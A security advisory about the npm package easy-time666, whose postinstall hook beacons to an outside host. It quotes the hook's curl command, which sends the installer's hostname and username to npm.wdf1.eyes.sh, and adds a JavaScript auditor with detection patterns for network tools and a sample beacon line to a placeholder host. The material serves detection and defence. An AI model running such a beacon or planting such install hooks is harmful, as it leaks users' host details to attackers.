
MAL-2026-5749

Malicious code in easy-time666 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22)

package.json declares a postinstall hook that runs `curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami)` over plain HTTP on every `npm install`, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON `{ping:'npm'}` to the same host (`npm.wdf1.eyes.sh`) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads.
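
A defensive check for the pattern described above, as an added example that is not part of the advisory or of the package: it audits a parsed `package.json` for install-time hooks that combine a network tool with host identifiers, and lists hosts contacted over plain HTTP. The function names, reason labels and the `collector.example` sample manifests are constructed for illustration.

```javascript
// Added example: flag npm install-time hooks that look like a recon beacon.
// INSTALL_HOOKS are npm's lifecycle events that run during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const NET_TOOL = /\b(curl|wget|nc|ncat)\b/;
// Commands or variables that expose the installing host or user.
const HOST_IDENT = /\b(hostname|whoami|uname)\b|\$\{?(USER|LOGNAME|HOSTNAME)\b/;
const HTTP_URL = /\bhttp:\/\/[^\s'"`)]+/gi;

// Return the hosts contacted over unencrypted HTTP in a script or source text.
function plainHttpHosts(text) {
  const hosts = new Set();
  for (const raw of text.match(HTTP_URL) || []) {
    try { hosts.add(new URL(raw).hostname); } catch { /* not a valid URL */ }
  }
  return [...hosts].sort();
}

// Inspect a parsed package.json; one finding per suspicious install hook.
function auditInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const reasons = [];
    if (NET_TOOL.test(cmd)) reasons.push("network-tool");
    if (HOST_IDENT.test(cmd)) reasons.push("host-identifier");
    const hosts = plainHttpHosts(cmd);
    if (hosts.length) reasons.push("plain-http");
    if (reasons.length === 0) continue;
    // A network tool plus a host identifier is the beacon shape described above.
    const beacon = reasons.includes("network-tool") && reasons.includes("host-identifier");
    findings.push({ hook, reasons, hosts, beacon });
  }
  return findings;
}

// Constructed sample manifests (placeholder domain, not taken from a real package).
const suspicious = {
  name: "sample-time-lib",
  scripts: { postinstall: "curl http://collector.example/pre?h=$(hostname)&u=$(whoami)" },
};
const benign = { name: "sample-clean", scripts: { test: "node test.js", prepare: "tsc -p ." } };

console.log(JSON.stringify(auditInstallHooks(suspicious), null, 2));
console.log(auditInstallHooks(benign).length);
```

`plainHttpHosts` can also be run over the text of JavaScript files shipped in a tarball, which covers a secondary callback script that the manifest does not reference directly.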

Affected packages

npm / easy-time666

No fixed version published yet for easy-time666 (npm). Pin to a known-safe version or switch to an alternative.